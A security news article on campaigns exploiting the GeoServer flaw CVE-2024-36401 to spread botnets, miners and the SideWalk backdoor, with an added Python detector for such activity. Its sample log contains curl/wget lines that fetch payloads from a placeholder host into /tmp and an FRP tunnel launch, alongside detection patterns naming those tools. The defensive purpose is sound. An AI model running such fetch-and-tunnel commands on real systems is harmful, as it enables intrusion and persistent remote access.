GeoServer Weakness Exploited by Intruders for Distributing Backdoors and Botnet Malware
A recently disclosed security flaw in OSGeo GeoServer GeoTools has been exploited in multiple campaigns to deliver cryptocurrency miners, botnet malware such as Condi and JenX, and a known backdoor called SideWalk.
The vulnerability is a critical remote code execution flaw (CVE-2024-36401, CVSS score: 9.8) that could allow malicious actors to take control of susceptible instances.
In mid-July, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added it to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. According to the Shadowserver Foundation, exploitation attempts against its honeypot sensors were observed starting July 9, 2024.
According to Fortinet FortiGuard Labs, the flaw has been observed being exploited to deliver GOREVERSE, a reverse proxy server designed to establish a connection with a command-and-control (C2) server for post-exploitation activity.
These attacks are reportedly aimed at IT service providers in India, tech firms in the U.S., governmental bodies in Belgium, and telcos in Thailand and Brazil.
The GeoServer flaw has also served as a conduit for Condi and a Mirai botnet variant called JenX, as well as at least four types of cryptocurrency miners, one of which is retrieved from a counterfeit website impersonating the Institute of Chartered Accountants of India (ICAI).
Arguably the most notable of the attack chains exploiting the flaw is the one that delivers an advanced Linux backdoor named SideWalk, which is attributed to a Chinese threat actor tracked as APT41.
The chain begins with a shell script that fetches ELF binaries for the ARM, MIPS, and x86 architectures. The binary then decrypts the C2 server address from an encrypted configuration, connects to it, and retrieves further commands to execute on the compromised device.
The chain also involves running a legitimate tool named Fast Reverse Proxy (FRP) to evade detection by setting up an encrypted tunnel from the host to the attacker-controlled server, enabling persistent remote access, data exfiltration, and payload deployment.
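The behaviour described above (a web-application process spawning downloads of multi-architecture payloads, followed by an FRP client) lends itself to host-based detection. The following is an added example, not code from the article or from Fortinet; it runs a small detector over a constructed process-event log, and the event format, process names, paths and URLs are all assumptions.

```python
import re
from collections import defaultdict

# Constructed sample, "ts pid ppid comm cmdline" per line. Not real telemetry;
# the GeoServer path and payload URLs are placeholders.
SAMPLE_EVENTS = """\
1 1001 1 java /usr/bin/java -jar /opt/geoserver/start.jar
2 1042 1001 sh sh -c curl -s http://payload.invalid/bin.x86 -o /tmp/bin.x86
3 1043 1001 sh sh -c wget -q http://payload.invalid/bin.arm -O /tmp/bin.arm
4 1044 1001 sh sh -c wget -q http://payload.invalid/bin.mips -O /tmp/bin.mips
5 1050 1042 bin.x86 /tmp/bin.x86
6 1060 1050 frpc /tmp/frpc -c /tmp/frpc.ini
7 2000 1 bash -bash
8 2001 2000 curl curl -s https://example.org/index.html
"""

WEBAPP_COMMS = {"java"}          # GeoServer runs inside a JVM (assumption)
DOWNLOADERS = re.compile(r"\b(curl|wget)\b")
ARCH_TOKENS = re.compile(r"\b(x86|x86_64|arm|mips)\b", re.I)
TUNNEL_COMMS = {"frpc", "frps"}  # Fast Reverse Proxy client/server binaries

def parse_events(text):
    events = {}
    for line in text.splitlines():
        ts, pid, ppid, comm, cmdline = line.split(" ", 4)
        events[int(pid)] = {"ts": int(ts), "pid": int(pid), "ppid": int(ppid),
                            "comm": comm, "cmdline": cmdline}
    return events

def webapp_ancestor(events, pid):
    """Walk up the parent chain; return the pid of a web-app (java) ancestor or None."""
    seen = set()
    while pid in events and pid not in seen:
        seen.add(pid)
        if events[pid]["comm"] in WEBAPP_COMMS:
            return pid
        pid = events[pid]["ppid"]
    return None

def detect(events):
    findings, archs = [], defaultdict(set)
    for ev in sorted(events.values(), key=lambda e: e["ts"]):
        root = webapp_ancestor(events, ev["ppid"])
        if root is None:
            continue  # benign: not descended from the web application
        if DOWNLOADERS.search(ev["cmdline"]):
            findings.append(f"pid {ev['pid']}: download spawned under web app pid {root}")
            archs[root].update(a.lower() for a in ARCH_TOKENS.findall(ev["cmdline"]))
        if ev["comm"] in TUNNEL_COMMS:
            findings.append(f"pid {ev['pid']}: FRP tunnel client under web app pid {root}")
    for root, seen in archs.items():
        if len(seen) >= 2:  # one host fetching several architectures is a staging tell
            findings.append(f"web app pid {root}: multi-arch payload staging {sorted(seen)}")
    return findings
```

The benign `curl` under an interactive `bash` (pid 2001) is not flagged, because only processes beneath the web-application tree are considered.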
“The primary targets seem to be spread across three key regions: South America, Europe, and Asia,” noted security researchers Cara Lin and Vincent Li.

“This geographical diversity indicates a sophisticated and widely-reaching attack campaign, possibly exploiting vulnerabilities common to these different markets or aiming at specific industries prevalent in these regions.”
The development comes as CISA recently added two 2021 flaws in DrayTek VigorConnect (CVE-2021-20123 and CVE-2021-20124, CVSS scores: 7.5) to its KEV catalog; they could be leveraged to download arbitrary files from the underlying operating system with root privileges.